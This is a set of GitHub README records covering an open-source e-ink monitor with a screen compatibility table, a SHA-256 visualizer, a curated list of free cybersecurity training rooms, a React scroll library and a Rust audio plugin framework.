no. 1, 2008, pp. 907–10, https://doi.org/10.1889/1.3069822. Lai, Chih-chang, and Ching-chih Tsai. “A Modified Stripe-RGBW TFT-LCD with Image-Processing Engine for Mobile Phone Displays.” IEEE Transactions on Consumer Electronics, vol. 53, no. 4, 2007, pp. 1628–33, https://doi.org/10.1109/TCE.2007.4429262. License This document, other than references explicitly given with their corresponding license, is released into the public domain. The hardware design is released under the CERN Open Source Hardware License strongly-reciprocal variant, CERN-OHL-S. A copy of the license is provided in the source repository. 
Additionally, a user guide for the license is provided on ohwr.org. The firmware code is licensed under the MIT license with the following exceptions: The USB PD library is derived from the Chromium OS project and Reclaimer Labs. The library is licensed under the BSD license. Appendix Using Screens without Datasheet To be written Screen List This is a list of Eink screens, their key parameters, and their compatibility with Caster/Glider. The information is gathered from public sources, so it might be incorrect. This is not a complete list of all screens Eink has ever produced or is in production. This table is intended for hobbyists buying used screens. If you are designing a product with an Eink screen, please contact Eink directly. Other than a few exceptions, only screens without an integrated TCON are listed here (in other words, SPI screens are generally not included here). These screens are the main focus of this project anyway. The screen size is given by the first 3 numbers in the model number, so it's not listed separately in the table. For example, ED060SC4 is 6.0", ED097OC1 is 9.7", and ES133UT1 is 13.3". The adapter column refers to the adapter needed for this particular screen; however, there is no guarantee that it would work, even if it's listed as tested. | Model Name | Model Number | FPL Platform | Resolution | Marketing Name | R Typ | CR Typ | Year | Interface | Pin Count | Adapter | Tested? | | ---------- | ------------ | ------------ | ----------- | --------------------------- | ----- | ------ | ----- | --------- | --------- | ------- | ------- | | ED038TH1 | | V320 | 600x600 | Carta | 45% | 17:1 | 2015 | TTL | 34 | 34P-A | | | ET040TC1 | | | 720x480 | Pearl | | | | TTL | | | | | ET040TC2 | | | 720x480 | Pearl | | | | TTL | | | | | ED043WC1 | | V220 | 800x480 | Pearl | 35% | 12:1 | 2013 | TTL | 39 | 39P-C | | | ED043WC3 | VA3200-DCA | V220 | 800x480 | Pearl | | | 2014 | TTL | 39 | 39P-C | | | ED043WC5 | VD1405-CGA | 400 | 800x480 | Carta 1200 | | | | SPI | | | | | ED047TC1 | | V220 | 960x540 | Pearl | 35% | 12:1 | 2015 | TTL | 44 | | | | ED047TC2 | | V220 | 960x540 | Pearl | 35% | 12:1 | 2016 | TTL | 44 | | | | ET047TC1 | | 320 | 960x540 | Carta 1.2 | | | | TTL | | | | | ET047TC2 | | 320 | 960x540 | Carta 1.2 | | | | TTL | | | | | ED050SC3 | | V110 | 800x600 | Vizplex | 35% | >6:1 | 2008 | TTL | 33 | 33P-A | | | ED050SU3 | | V220 | 800x600 | Pearl | | | | TTL | 39 | | | | ED052TC2 | | 320 | 960x540 | Carta | 45% | 16:1 | 2016 | TTL | 40 | | | | ED052TC4 | VB3300-EBA | 320 | 1280x720 | Carta 1.2 | 45% | 16:1 | 2017 | TTL | 50 | | | | EC058TC1 | SA1452-EHA | 320 | 1440x720 | Kaleido / Carta | 24% | 15:1 | 2020 | TTL | 50 | | | | ED058TC7 | | 320 | | Carta | | | | TTL | | | | | ED058TC8 | VB3300-EHB | 320 | 1440x720 | Carta | | | | TTL | | | | | ED060SC1 | | 2.1 | 800x600 | | | | | TTL | 39 | 39P-B | | | ED060SC3 | | V100 | 800x600 | Vizplex | | | | TTL | 39 | 39P-B | | | ED060SC4 | | V110 | 800x600 | Vizplex | 35% | >6:1 | 2008 | TTL | 39 | 39P-B | | | ED060SC7 | | V220E | 800x600 | Pearl | 40% | 12:1 | 2010 | TTL | 34 | 34P-B | | | ED060SCA | | V110 | 800x600 | Vizplex | | | | TTL | | | | | ED060SCE | | V220/V220E | 800x600 | Pearl | | | | TTL | 34 | 34P-B | | | ED060SCF | | V220 | 800x600 | Pearl | | | | TTL | 34 | 34P-A | | | ED060SCG | | V220E | 800x600 | Pearl | | | | TTL | 34 | 34P-B | | | ED060SCN | | V220E | 800x600 | Pearl | | | | TTL | 34 | 34P-A | | | ED060SCS | | | 800x600 | | | | | TTL | 34 | 34P-B | | | ED060SCP | | V220 | 800x600 | Pearl | | | | TTL | 34 | 34P-A | | | 
ED060SCQ | | V220 | 800x600 | Pearl | | | | TTL | | | | | ED060SCS | | | 800x600 | | | | | TTL | | | | | ED060SCT | | 320 | 800x600 | Carta | | | | TTL | 34 | 34P-B | | | ED060SD1 | | 320 | 800x600 | Carta | | | | TTL | | | | | ED060XC3 | | V220 | 1024x758 | Pearl | | | | TTL | 34 | 34P-A | Yes | | ED060XC5 | | V220 | 1024x758 | Pearl | 35% | 12:1 | 2011 | TTL | 34 | 34P-A | | | ED060XC8 | | V320 | 1024x758 | Carta | | | | TTL | 35 | 35P-A | Yes | | ED060XC9 | | | 1024x758 | | | | | TTL | 34 | 34P-A | | | ED060XCD | | 320 | 1024x758 | Carta | | | | TTL | | | | | ED060XCG | VD1405-FOA | 320/400 | 1024x758 | Carta 1000 / 1200 | 40% | 17:1 | 2020 | TTL | | | | | ED060XCH | VD1405-FOE | 400 | 1024x758 | Carta 1200 | | | | TTL | | | | | ED060XD4 | | 320 | 1024x758 | Carta | | | | TTL | 34 | 34P-A | Yes | | ED060XD6 | | | 1024x758 | | | | | TTL | 34 | 34P-A | | | ED060XG1 | | V110/V220 | 1024x758 | Vizplex / Pearl | 40% | 12:1 | 2012 | TTL | | | | | ED060XG2 | | V220 | 1024x758 | Pearl | | | | TTL | | | | | ED060XG3 | | 320 | 1024x758 | Carta | | | | TTL | | | | | ED060XH2 | | | 1024x758 | | | | | TTL | 34 | 34P-A | | | ED060XH7 | | 320 | 1024x758 | Carta 1.2 | 45% | 17:1 | 2015 | TTL | | | | | ED060XH9 | VB3300-FOG | 320 | 1024x758 | Carta | | | | TTL | | | | | ED060TC1 | | 320 | 1448x1072 | Carta | | | | TTL | 35 | 35P-A | | | ED060KC1 | | 320 | 1448x1072 | Carta | 46% | 17:1 | 2014 | TTL | 34 | 34P-A | | | ED060KC4 | | 320 | 1448x1072 | Carta | | | | TTL | | | | | ED060KD1 | | 320 | 1448x1072 | Carta | | | | TTL | 34 | 34P-A | Yes | | ED060KG1 | | 320 | 1448x1072 | Carta | 47% | 17:1 | 2015 | TTL | 34 | 34P-A | | | ED060KH4 | | 320 | 1448x1072 | Carta | | | | TTL | | | | | ED060KH6 | VB3300-FOE | 320 | 1448x1072 | Carta | | | | TTL | | | | | ED060KHC | | | 1448x1072 | | | | | TTL | | | | | ED060KHE | VD1405-FOH | | 1448x1072 | Carta 1300 | | | | TTL | 34 | 34P-A | | | EC060KH3 | SA1452-FOA | | 1448x1072 | Kaleido | | | | TTL | | | | | EC060KH5 | SC1452-FOD | | 1448x1072 | Kaleido 3 | | | | TTL | 34 | 34P-A | | | ED061KC1 | VD1405-FAA | 400 | 1648x824 | Carta 1200 | | | | TTL | | | | | ED067KC1 | VB3300-FGA | 320 | 1800x900 | Carta | 45% | 16:1 | 2020 | TTL | 50 | 50P-B | | | EC067KC1 | SA1452-FGA | | 1800x900 | Kaleido | | | | TTL | 50 | 50P-B | | | ED068TG1 | | 320 | 1440x1080 | Carta | | | <2013 | TTL | | | | | ED068TH1 | | 320 | 1440x1080 | Carta | | | <2014 | TTL | | | | | ED068TH3 | VB3300-FHA | 320 | 1440x1080 | Carta | | | | TTL | | | | | ED068KC1 | | 400SU | 1648x1236 | Carta 1200 | | | | TTL | 40 | | | | ED068KC3 | VD1405-FHD | 400 | 1648x1236 | Carta 1200 | | | | TTL | 40 | | | | ED068KC5 | VD1405-FHF | 400 | 1648x1236 | Carta 1200 | >44% | >19:1 | | TTL | 40 | | | | ED070KC2 | | 320 | 1680x1264 | Carta 1100 | >47% | >16:1 | | TTL | | | | | ED070KC3 | | 320 | 1680x1264 | Carta 1100 | | | | TTL | | | | | ED070KC4 | VD1400-GOC | 400 | 1680x1264 | Carta 1200 | | | | TTL | | | | | ED070KH1 | | 320 | 1680x1264 | Carta 1100 | | | | TTL | | | | | EC070KH1 | SC1452-GOA | | 1680x1264 | Kaleido Plus | | | | TTL | | | | | LB071WS1 | | | 1024x600 | | | 7:1 | | TTL | | | | | ET073TC1 | | V320 | 750x200 | Carta | | | 2016 | TTL | | | | | ED078KC1 | | | 1872x1404 | Carta 1.2 | 45% | 16:1 | 2016 | TTL | 40 | 40P-A | | | ED078KC2 | VB3300-GHC | 320 | 1872x1404 | Carta | | | | TTL | 40 | 40P-A | | | ED078KH1 | | 320 | 1872x1404 | Carta | | | | TTL | 40 | 40P-A | | | ED078KH3 | | 320 | 1872x1404 | Carta 1.2 | | | | TTL | 40 | 40P-A | | | ED078KH4 | VB3300-GHB | 320 | 1872x1404 | Carta | | | | TTL | 40 
| 40P-A | | | EC078KH3 | SC1452-GHA | | 1872x1404 | Kaleido Plus | | | | TTL | 40 | 40P-A | | | EC078KH4 | SC1452-GHB | | 1872x1404 | Kaleido Plus ? | | | | TTL | 40 | 40P-A | | | EC078KH5 | SC1452-GHC | | 1872x1404 | Kaleido Plus ? | | | | TTL | 40 | 40P-A | | | EC078KH6 | SC1452-GHD | | 1872x1404 | Kaleido 3 | | | | TTL | 40 | 40P-A | | | EC078KH7 | SC1452-GHE | | 1872x1404 | Kaleido 3 | | | | TTL | 40 | 40P-A | | | ED080XC1 | | V110 | 1024x768 | Vizplex | | | | TTL | | | | | ED080TC1 | | V220 | 1600x1200 | Pearl | | | | TTL | | | | | EC080SC2 | | V250 | 600xRGBx800 | Triton 2 | | | | TTL | 40 | 40P-A | Yes | | ES080KC2 | VD1400-HOB | 400 | 1920x1440 | Carta 1200 | | | | TTL | | | | | ES080KH1 | | | | | | | | | | | | | AC080KH1 | AD1004-HOA | HAL3 | 1920x1440 | Gallery 3 | | | | MiniLVDS | | | | | ED097OC1 | | V110A | 1200x825 | Vizplex | 35% | 7:1 | 2008 | TTL | 33 | 33P-A | | | ED097OC4 | | V110A/V220 | 1200x825 | Vizplex / Pearl | | | | TTL | 33 | 33P-A | | | ED097OD2 | | V220 | 1200x825 | Pearl | | | | TTL | 33 | 33P-A | | | ED097TC1 | | V220 | 1200x825 | Pearl | | | | TTL | 33 | 33P-A | | | ED097TC2 | VB3300-JGA | 320 | 1200x825 | Carta 1.2 | 42% | 16:1 | 2016 | TTL | 33 | 33P-A | | | EL097TR2 | EA2220-JGB | | 1200x825 | Spectra 3000 | | | | TTL | | | | | ED100UC1 | VB3300-KOA | 320 | 1600x1200 | Carta | 45% | 16:1 | 2020 | TTL | 40 | DIRECT | | | ES103TC1 | VB3300-KCA | 320 | 1872x1404 | Carta 1.2 | 40% | 12:1 | 2016 | TTL | 40 | DIRECT | | | ED103TC2 | VB3300-KCD | 320 | 1872x1404 | Carta | 43% | 14:1 | 2019 | TTL | 40 | DIRECT | | | ES103TD1 | | 320 | 1872x1404 | Carta | | | | TTL | | | | | ES103TD3 | | 320 | 1872x1404 | Carta | | | | TTL | | | | | EC103TD1 | SA1452-KCC | | 1872x1404 | Kaleido | | | | TTL | | | | | EC103TH2 | SC1452-KCB | | 1872x1404 | Kaleido Plus | | | | TTL | | | | | EC103KH2 | SC1452-KCD | | 2480x1860 | Kaleido 3 | | | | TTL | | | | | ES107KC1 | VD1400-KGA | 400 | 2560x1920 | Carta 1200 | | | | TTL | | | | | ES108FC1 | | 320 | 1920x1080 | Carta | 46% | 16:1 | 2017 | TTL | 50 | 50P-C | | | ES108FC2 | | 320 | 1920x1080 | Carta | | | | TTL | | | | | ED113TC1 | VB3300-LCA | 320 | 2400x1034 | Carta | 35% | 12:1 | 2017 | TTL | 50 | 50P-A | | | ED113TC2 | VB3300-LCB | 320 | 2400x1034 | Carta 1.2 | 35% | 12:1 | 2019 | TTL | 50 | 50P-A | | | EC113TC1 | SC1452-LCA | | 2400x1034 | Kaleido Plus ? 
| | | | TTL | 50 | 50P-A | | | ED115OC1 | | V220 | 2760x2070 | Pearl | 35% | 12:1 | 2012 | TTL | 40 | DIRECT | | | AC118TC1 | AD1004-LHA | | | Gallery 3 | | | | MiniLVDS | | | | | ES120MC1 | VD1400-MOA | 400 | 2560x1600 | Carta 1200 | | | | TTL | 40 | | | | ES133UT1 | | V220 | 1600x1200 | Pearl | 35% | 12:1 | 2013 | TTL | 39 | 39P-A | Yes | | ES133UT2 | | 320 | 1600x1200 | Carta | | | | TTL | 39 | 39P-A | Yes | | ES133UE2 | | 320 | 1600x1200 | Carta | | | | TTL | 39 | 39P-A | | | ED133UT2 | VB3300-NCB | 320 | 1600x1200 | Carta 1.2 | 45% | 16:1 | 2016 | TTL | 39 | 39P-A | | | ED133UT3 | VB3300-NCC | 320 | 1600x1200 | Carta | 45% | 16:1 | 2019 | TTL | 39 | 39P-A | | | ES133TT3 | | 320 | 2200x1650 | Carta 1.2 | 40% | 12:1 | 2016 | TTL | 39 | | | | ES133TT5 | VH1948-NCC | 450 | 2200x1650 | Carta 1250 | | | | TTL | 39 | | | | EC133UJ1 | SD1452-NCB | | 1600x1200 | Kaleido 3 Outdoor | | | | TTL | 39 | 39P-A | | | AC133UT1 | AA1020-NCA | | 1600x1200 | Gallery / Gallery 4000 | 35% | 10:1 | 2020 | TTL | 39 | 39P-A | | | EL133US1 | | | 1600x1200 | Spectra 3000 | | | | TTL | 39 | 39P-A | Yes | | EL133UR1 | EA2220-NCC | | 1600x1200 | Spectra 3000 | 33% | 15:1 | 2020 | TTL | 39 | 39P-A | | | EL133UF1 | ED2208-NCA | | 1600x1200 | Spectra 6 | | | | QSPI | | | | | ED140TT1 | VB3300-IDA | 320 | 1440x300 | Carta | | | | TTL | | | | | AC253TT1 | AA1020-PEA | | 3200x1800 | Gallery Plus / Gallery 4000 | 35% | 10:1 | 2020 | MiniLVDS | 51x2 | | | | EL253EW1 | ED2208-PEA | | 3200x1800 | Spectra 6 | | | | MiniLVDS | | | | | EC253TT1 | SD1452-PEA | | 3200x1800 | Kaleido 3 Outdoor | | | | MiniLVDS | | | | | ED253TT1 | VB3300-PEA | 320 | 3200x1800 | Carta 1.2 | | | | MiniLVDS | 51x2 | | | | ED253TT2 | VB3300-PEB | 320 | 3200x1800 | Carta 1.2 | | | | MiniLVDS | 51x2 | | | | ED253TT3 | VB3300-PEC | 320 | 3200x1800 | Carta 1.2 | | | | MiniLVDS | 51x2 | | | | EL253TV1 | EB2200-PEA | | 3200x1800 | Spectra 3100 | | | | MiniLVDS | 51x2 | | | | ED280TT1 | VB3300-PHA | 320 | 3840x1080 | Carta 1.2 | 40% | 12:1 | 2020 | MiniLVDS | 51x2 | | | | ED312TT2 | VA3200-QAA | V220 | 2560x1440 | Pearl | | | | TTL | 50x4 | | | | ED312TT3 | VA3200-QAB | V220 | 2560x1440 | Pearl | 40% | 12:1 | 2018 | TTL | 50x4 | | | | EC312TT2 | SB1452-QAA | V220 | 2560x1440 | Triton | | | | TTL | 50x4 | | | | EL315TW1 | ED2208-QBA | | 2560x1440 | Spectra 6 | | | | QSPI | | | | | ED420TT1 | | V220 | 2880x2160 | Pearl | | | | TTL | 50x2 | | | | ED420TT3 | VB3300-RBA | 320 | 2880x2160 | Carta 1.2 | 45% | 16:1 | 2020 | TTL | 50x2 | | | | ED420TT5 | VB3300-RBB | 320 | 2880x2160 | Carta 1.2 | | | | TTL | 50x2 | | | Note: Carta 1.2 is also known as Carta 1000. If the table cell says Carta it also likely means Carta 1000 (could be 1100 as well, I don't know for sure).;Open-source E-ink monitor. Mirror of https://gitlab.com/zephray/glider;[]
Modos-Labs/Glider
dmarman/sha256algorithm;Sha256algorithm Sha256 algorithm explained online, step by step, visually sha256algorithm.com This website will help you understand how a sha256 hash is calculated from start to finish. I hope this will be helpful for students learning about hash functions and sha256. The code is quite messy and there are probably some parts that don't follow the React way. Ask me anything at @manceraio Install I built this using create-react-app. If you want to play with it, just install the JavaScript dependencies: npm install and start the local server: npm start;Sha256 Algorithm Explained;[]
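If you want to sanity-check the site's step-by-step visualization against a reference implementation, here is a minimal sketch using Python's standard hashlib module (the input message is just an arbitrary example):

```python
import hashlib

# Hash an arbitrary example message and print the digest the
# visualization should arrive at after its final round.
message = b"hello world"
print(hashlib.sha256(message).hexdigest())
```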
dmarman/sha256algorithm
brootware/awesome-cyber-security-university;Awesome Cyber Security University A curated list of awesome and free educational resources that focus on learning by doing. Because education should be free. Contents About Introduction and Pre-Security - (Completed/In Progress) Free Beginner Red Team Path - (Add your badge here. The badge code is hidden in this repo) Free Beginner Blue Team Path - (Add your badge here. The badge code is hidden in this repo) Bonus CTF practice and Latest CVEs - (Completed/In Progress) Bonus Windows - (Completed/In Progress) Extremely Hard Rooms to do - (Completed/In Progress) About Cyber Security University is a curated list of awesome and free educational resources that focus on learning by doing. There are 6 parts to this: 1. Introduction and Pre-security 2. Free Beginner Red Team Path 3. Free Beginner Blue Team Path 4. Bonus practices 5. Latest CVEs 6. Extremely Hard rooms The tasks are ordered linearly by difficulty, so it's recommended to do them in order, but you can still jump around and skip some rooms if you find that you are already familiar with the concepts. As you go through the curriculum, you will find completion badges for both the red and blue team paths hidden within this README.md. You can copy the HTML code for them and add it to the content page below once you have completed them. ↑ Contributing Pull requests are welcome on the condition that the resource is free! Please read the contribution guide in the wiki if you wish to add tools or resources. Introduction and Pre-Security Level 1 - Intro OpenVPN - Learn how to connect to a virtual private network using OpenVPN. Welcome - Learn how to use a TryHackMe room to start your upskilling in cyber security. Intro to Researching - A brief introduction to research skills for pentesting. Linux Fundamentals 1 - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal. Linux Fundamentals 2 - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal. Linux Fundamentals 3 - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal. Pentesting fundamentals - Fundamentals of penetration testing. Principles of security - Principles of security. Red Team Engagements - Intro to red team engagements. Hip Flask - An in-depth walkthrough covering pentest methodology against a vulnerable server. Introductory CTFs to get your feet wet Google Dorking - Explaining how search engines work and leveraging them to find hidden content! OSINT - Intro to Open Source Intelligence. Shodan.io - Learn about Shodan.io and how to use it for device enumeration. ↑ Free Beginner Red Team Path Level 2 - Tooling Tmux - Learn to use tmux, one of the most powerful multi-tasking tools on Linux. Nmap, Curl and Netcat - Get experience with Nmap, Curl and Netcat for network communications. Web Scanning - Learn the basics of automated web scanning. Sublist3r - Learn how to find subdomains with Sublist3r. Metasploit - An introduction to the main components of the Metasploit Framework. Hydra - Learn about and use Hydra, a fast network logon cracker, to bruteforce and obtain a website's credentials. Linux Privesc - Practice your Linux privilege escalation skills on an intentionally misconfigured Debian VM with multiple ways to get root! SSH is available. 
Red Team Fundamentals - Learn about the basics of a red engagement, the main components and stakeholders involved, and how red teaming differs from other cyber security engagements. Red Team Recon - Learn how to use DNS, advanced searching, Recon-ng, and Maltego to collect information about your target. Red Team Intro CTFs Vulnversity - Learn about active recon, web app attacks and privilege escalation. Blue - Deploy & hack into a Windows machine, leveraging common misconfigurations issues. Simple CTF - Beginner level CTF. Bounty Hacker - A space cowboy-themed boot to root machine. ↑ Level 3 - Crypto & Hashes with CTF practice Crack the hash - Cracking hash challenges. Agent Sudo - You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth. The Cod Caper - A guided room taking you through infiltrating and exploiting a Linux system. Ice - Deploy & hack into a Windows machine, exploiting a very poorly secured media server. Lazy Admin - Easy linux machine to practice your skills. Basic Pentesting - This is a machine that allows you to practice web app hacking and privilege escalation. Bypassing UAC - Learn common ways to bypass User Account Control (UAC) in Windows hosts. ↑ Level 4 - Web OWASP top 10 - Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks. Inclusion - A beginner-level LFI challenge. Injection - Walkthrough of OS Command Injection. Demonstrate OS Command Injection and explain how to prevent it on your servers. Juiceshop - This room uses the OWASP juice shop vulnerable web application to learn how to identify and exploit common web application vulnerabilities. Overpass - What happens when some broke CompSci students make a password manager. Year of the Rabbit - Can you hack into the Year of the Rabbit box without falling down a hole. DevelPy - Boot2root machine for FIT and bsides Guatemala CTF. Jack of all trades - Boot-to-root originally designed for Securi-Tay 2020. Bolt - Bolt themed machine to root into. ↑ Level 5 - Reverse Engineering & Pwn Intro to x86 64 - This room teaches the basics of x86-64 assembly language. CC Ghidra - This room teaches the basics of ghidra. CC Radare2 - This room teaches the basics of radare2. Reverse Engineering - This room focuses on teaching the basics of assembly through reverse engineering. Reversing ELF - Room for beginner Reverse Engineering CTF players. Dumping Router Firmware - Reverse engineering router firmware. Intro to pwntools - Introduction to popular pwn tools framework. Pwnkit: CVE-2021-4034 - Interactive lab for exploiting and remediating Pwnkit (CVE-2021-4034) in the Polkit package. ↑ Level 6 - PrivEsc Sudo Security Bypass - A tutorial room exploring CVE-2019-14287 in the Unix Sudo Program. Room One in the SudoVulns Series. Sudo Buffer Overflow - A tutorial room exploring CVE-2019-18634 in the Unix Sudo Program. Room Two in the SudoVulns Series. Windows Privesc Arena - Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. Linux Privesc Arena - Students will learn how to escalate privileges using a very vulnerable Linux VM. Windows Privesc - Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. Blaster - Metasploit Framework to get a foothold. Ignite - A new start-up has a few security issues with its web server. Kenobi - Walkthrough on exploiting a Linux machine. 
Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation. Capture the flag - Another beginner-level CTF challenge. Pickle Rick - Rick and Morty themed LFI challenge. Congratulations! If you have made it this far, you deserve a badge! Put this in your writeups or git profile. You can continue doing the CTFs below. Click here to get your red team badge! ↑ Free Beginner Blue Team Path Level 1 - Tools Introduction to digital forensics - Intro to digital forensics. Windows Fundamentals - Intro to Windows. Nessus - Intro to the Nessus scanner. Mitre - Intro to the MITRE ATT&CK framework. IntroSIEM - Introduction to SIEM. Yara - Intro to Yara for malware analysis. OpenVAS - Intro to OpenVAS. Intro to Honeypots - Intro to honeypots. Volatility - Intro to memory analysis with Volatility. Red Line - Learn how to use Redline to perform memory analysis and scan for IOCs on an endpoint. Autopsy - Use Autopsy to investigate artifacts from a disk image. ↑ Level 2 - Security Operations, Incident Response & Threat Hunting Investigating Windows - Investigating Windows. Juicy Details - A popular juice shop has been breached! Analyze the logs to see what happened. Carnage - Apply your analytical skills to analyze the malicious network traffic using Wireshark. Squid Game - Squid Game-themed CTF. Splunk Boss of the SOC V1 - Part of the Blue Primer series; learn how to use Splunk to search through massive amounts of information. Splunk Boss of the SOC V2 - Splunk analysis vol 2. Splunk Boss of the SOC V3 - Splunk analysis vol 3. Hunt Conti with Splunk - An Exchange server was compromised with ransomware. Use Splunk to investigate how the attackers compromised the server. Hunting for Execution Tactic - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT&CK Tactic of Execution (TA0002). Hunting for Credential Access - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT&CK Tactic of Credential Access (TA0006). Hunting for Persistence Access - Join Cyborg Security's team of threat hunting instructors for a fun and hands-on-keyboard threat hunting workshop covering the topic of adversarial persistence (TA0003). Hunting for Defense Evasion - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT&CK Tactic of Defense Evasion (TA0005). ↑ Level 3 - Beginner Forensics, Threat Intel & Cryptography Matryoshka doll - Beginner file analysis challenge. The Glory of the Garden - Beginner image analysis challenge. Packets Primer - Beginner packet analysis challenge. Wireshark doo doo doo - Beginner packet analysis challenge. Wireshark two two two - Beginner packet analysis challenge. Trivial flag transfer protocol - Beginner packet analysis challenge. What Lies within - Beginner decoding analysis challenge. Illumination - Medium level forensics challenge. Emo - Medium level forensics challenge. Obscure - Medium level forensics challenge. Intel101 Challenge - Medium level threat intel challenge. Introduction to Cryptohack - Medium level cryptography challenge. ↑ Level 4 - Memory & Disk Forensics Sleuthkit Intro - Medium level disk forensics challenge. Reminiscent - Medium level disk forensics challenge. Hunter - Windows Disk Image Forensics - Medium level disk forensics challenge. Spotlight - Mac Disk Image Forensics - Medium level disk forensics challenge. Ulysses - Linux Disk Image Forensics - Medium level disk forensics challenge. 
Banking Troubles - Windows Memory Image Forensics - Medium level memory forensics challenge. Detect Log4J - Medium level disk forensics challenge. ↑ Level 5 - Malware and Reverse Engineering History of Malware - Intro to malware history. Malware Introduction - Intro to malware. Basic Malware Reverse Engineering - Intro to malware RE. Intro Windows Reversing - Intro to Windows RE. Windows x64 Assembly - Introduction to x64 assembly on Windows. JVM reverse engineering - Learn reverse engineering for Java Virtual Machine bytecode. Get PDF (Malicious Document) - Reversing PDF malware. Congratulations! If you have made it this far, you deserve a badge! Put this in your writeups or git profile. You can continue doing the CTFs below. Click here to get your blue team badge! ↑ Bonus CTF practice and Latest CVEs Bandit - Aimed at absolute beginners; teaches the basics of remote server access. Natas - Teaches the basics of server-side web security. Post Exploitation Basics - Learn the basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom. Smag Grotto - An obscure boot to root machine. Dogcat - I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container. Buffer Overflow Prep - Practice stack-based buffer overflows. Break out the cage - Help Cage bring back his acting career and investigate the nefarious goings-on of his agent. Lian Yu - A beginner-level security challenge. Insecure Kubernetes - Exploiting Kubernetes by leveraging a Grafana LFI vulnerability. The Great Escape (docker) - Escaping a docker container. Solr Exploiting Log4j - Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun. Spring4Shell - Interactive lab for exploiting Spring4Shell (CVE-2022-22965) in the Java Spring Framework. Most Recent threats - Learn about the latest industry threats. Get hands-on experience identifying, exploiting, and mitigating critical vulnerabilities. ↑ Bonus Windows Attacktive Directory - Learn about Active Directory, which 99% of corporate networks run on. Retro - Breaking out of the retro-themed box. Blue Print - Hack into this Windows machine and escalate your privileges to Administrator. Anthem - Exploit a Windows machine in this beginner-level challenge. Relevant - Penetration testing challenge. ↑ Extremely Hard Rooms to do Ra - You have found WindCorp's internal network and their Domain Controller. Pwn the network. CCT2019 - Legacy challenges from the US Navy Cyber Competition Team 2019 Assessment sponsored by US TENTH Fleet. Theseus - The first installment of the SuitGuy series of very hard challenges. IronCorp - Get access to Iron Corp's system. Carpe Diem 1 - Recover your client's encrypted files before the ransomware timer runs out. Borderlands - Compromise a perimeter host and pivot through this network. Jeff - Hack into Jeff's web server. Year of the Owl - Owl-themed boot to root machine. Anonymous Playground - Want to become part of Anonymous? They have a challenge for you. EnterPrize - Enterprise-themed network to hack into. Racetrack Bank - It's time for another heist. Python Playground - Use Python to pwn this room. ↑ Footnotes Inspired by https://skerritt.blog/free-rooms/ Contributors & stargazers ✨ Special thanks to everyone who forked or starred the repository ❤️ Thanks goes to these wonderful people ( emoji key ): Oaker Min 🚇 🚧 📖 💻 Michael Paul Coder 📖 This project follows the all-contributors specification. 
Contributions of any kind are welcome! ↑;🎓 Because Education should be free. Contributions welcome! 🕵️ ;cyber-security,awesome-list,curriculum,courses,free,education,educational-project,cybersecurity,hacking,learning-by-doing
brootware/awesome-cyber-security-university
malerba118/scrollex;Scrollex A library to help you make beautiful scroll experiences using minimal code. Docs https://scrollex-docs.vercel.app/ Demos https://scrollex-docs.vercel.app/examples https://user-images.githubusercontent.com/5760059/167218020-d1ff94a8-a138-418e-9ef0-779c849a7c23.mp4;Build beautiful scroll experiences using minimal code;[]
malerba118/scrollex
robbert-vdh/nih-plug;NIH-plug NIH-plug is an API-agnostic audio plugin framework written in Rust, as well as a small collection of plugins. The idea is to have a stateful yet simple plugin API that gets rid of unnecessary ceremony wherever possible, while also keeping the amount of magic to a minimum and making it easy to experiment with different approaches to things. See the current features section for more information on the project's current status. Check out the documentation , or use the cookiecutter template to quickly get started with NIH-plug. Table of contents Plugins Framework Current features Building Plugin formats Example plugins Licensing Plugins Check each plugin's readme file for more details on what the plugin actually does. You can download the development binaries for Linux, Windows and macOS from the automated builds page. Or if you're not signed in on GitHub, then you can also find the latest nightly build here . You may need to disable Gatekeeper on macOS to be able to use the plugins. Scroll down for more information on the underlying plugin framework. Buffr Glitch is the plugin for you if you enjoy the sound of a CD player skipping. This plugin is essentially a MIDI-triggered buffer repeat plugin. When you play a note, the plugin will sample the period corresponding to that note's frequency and use that as a single waveform cycle. This can end up sounding like an in-tune glitch when used sparingly, or like a weird synthesizer when used less subtly. Crisp adds a bright crispy top end to any low bass sound. Inspired by Polarity's Fake Distortion video. Crossover is as boring as it sounds. It cleanly splits the signal into two to five bands using a variety of algorithms. Those bands are then sent to auxiliary outputs so they can be accessed and processed individually. Meant as an alternative to Bitwig's Multiband FX devices but with cleaner crossovers and a linear-phase option. Diopser is a totally original phase rotation plugin. Useful for oomphing up kickdrums and basses, transforming synths into their evil phase-y cousin, and making everything sound like a cheap Sci-Fi laser beam. Loudness War Winner does what it says on the tin. Have you ever wanted to show off your dominance by winning the loudness war? Neither have I. Dissatisfaction guaranteed. Puberty Simulator is that patent-pending One Weird Plugin that simulates the male voice change during puberty! If it was not already obvious from that sentence, this plugin is a joke, but it might actually be useful (or at least interesting) in some situations. This plugin pitches the signal down an octave, but it also has the side effect of causing things to sound like a cracking voice or to make them sound slightly out of tune. Safety Limiter is a simple tool to prevent ear damage. As soon as there is a peak above 0 dBFS or the specified threshold, the plugin will cut over to playing SOS in Morse code, gradually fading out again when the input returns back to safe levels. Made for personal use during plugin development and intense sound design sessions, but maybe you'll find it useful too! Soft Vacuum is a straightforward port of Airwindows' Hard Vacuum plugin with parameter smoothing and up to 16x linear-phase oversampling, because I liked the distortion and just wished it had oversampling. All credit goes to Chris from Airwindows. I just wanted to share this in case anyone else finds it useful. 
